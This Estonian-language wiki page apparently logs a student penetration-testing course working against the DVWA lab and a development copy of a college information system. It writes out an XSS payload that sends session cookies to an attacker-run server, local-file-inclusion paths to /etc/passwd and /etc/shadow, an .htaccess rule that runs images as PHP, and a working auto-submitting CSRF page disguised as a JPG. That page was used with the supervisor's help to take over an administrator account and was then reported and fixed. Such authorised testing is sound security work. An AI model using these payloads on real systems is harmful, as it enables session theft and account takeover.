Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
===== Fireforce plugin Firefoxis =====&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
===== Burpsuite v1.4 =====&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
==== CSRF - Cross-site request forgery ====&lt;br /&gt;
Katsetamine toimub koos Taaviga.&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna &amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
&lt;br /&gt;
Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==== Reflected Cross Site Scripting (XSS)  ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
====Subgraph Vega ====&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
==== Wapiti ====&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS&#039;iga midagi teha.&lt;br /&gt;
&lt;br /&gt;
==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====&lt;br /&gt;
=====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
=====2. katse - ÕIS&#039;i kasutaja parooli muutmine =====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
===Burp suite===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
